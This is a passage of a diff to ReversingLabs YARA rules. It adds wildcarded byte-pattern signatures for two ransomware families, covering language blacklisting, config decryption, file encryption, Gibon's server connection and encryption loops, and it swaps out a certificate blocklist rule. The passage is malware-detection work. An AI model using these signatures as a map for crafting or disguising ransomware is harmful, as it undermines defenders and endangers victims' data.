+            ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ??
+            ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ??
+            8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A
+            ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$check_blacklisted_languages_v2 = {
+            FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74
+            ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B
+            C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ??
+            66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04
+            ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9
+            22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64
+            A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33
+            FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D
+            76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ??
+            ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B
+            C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ??
+            3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40
+            ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA
+            83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55
+            ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A
+            ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3
+        }
+		$create_net_host_trav_threads_v2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 35
+        }
+		$fnv1a_hashing_v2 = {
+            55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ??
+            89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42
+            ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89
+            4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE
+        }
+		$decrypt_configuration_v2_1 = {
+            55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40
+            00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ??
+            ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ??
+            88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$decrypt_configuration_v2_2 = {
+            55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9
+            0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66
+            0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF
+            C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF
+            C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72
+            ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ??
+            ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 8B F0 F3 A4 8B C8 BE ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v2_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B
+            50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B
+            42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ??
+            8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2
+            46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF
+            69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74
+            24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ??
+            ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85
+            C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8
+            ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10
+            8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F
+            85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41
+            ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23
+            C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ??
+            8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF
+        }
+		$encrypt_files_v2_p2 = {
+            71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8
+            ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ??
+            33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47
+            8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1
+            F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ??
+            ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ??
+            6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8
+            ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ??
+            6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84
+            ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44
+            24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B
+            57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ??
+            ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E
+        }
+		$encrypt_files_v2_p3 = {
+            8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71
+            ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ??
+            F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33
+            FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B
+            40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ??
+            ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85
+            C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D
+            7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B
+            C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44
+            24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ??
+            ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ??
+            ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF
+            E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ??
+            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74
+            ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1
+            72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50
+            E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 5F 33 C0 5E 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and ( pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures [ i ] . serial == "bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" ) and 1579824000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $enum_resources_v1 ) and ( all of ( $find_files_v1_* ) ) and ( all of ( $encrypt_files_v1_* ) ) ) or ( ( $check_blacklisted_languages_v2 ) and ( $fnv1a_hashing_v2 ) and ( $create_net_host_trav_threads_v2 ) and ( all of ( $decrypt_configuration_v2_* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gibon ransomware."
 		author = "ReversingLabs"
-		id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3f1a5bee-8fc0-5596-b898-e97073731930"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5044-L5062"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Gibon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_server_connection_1_0 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
+            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ??
+            ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ??
+            83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$remote_server_connection_1_1 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01
+            41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15
+            ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72
+            ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82
+            ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D
+            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$encryption_loop_1_0 = {
+            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ??
+            8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85
+            F6 0F 84
+        }
+		$encryption_loop_1_1 = {
+            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ??
+            32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ??
+            8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95
+        }
+		$encryption_loop_1_2 = {
+            57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5
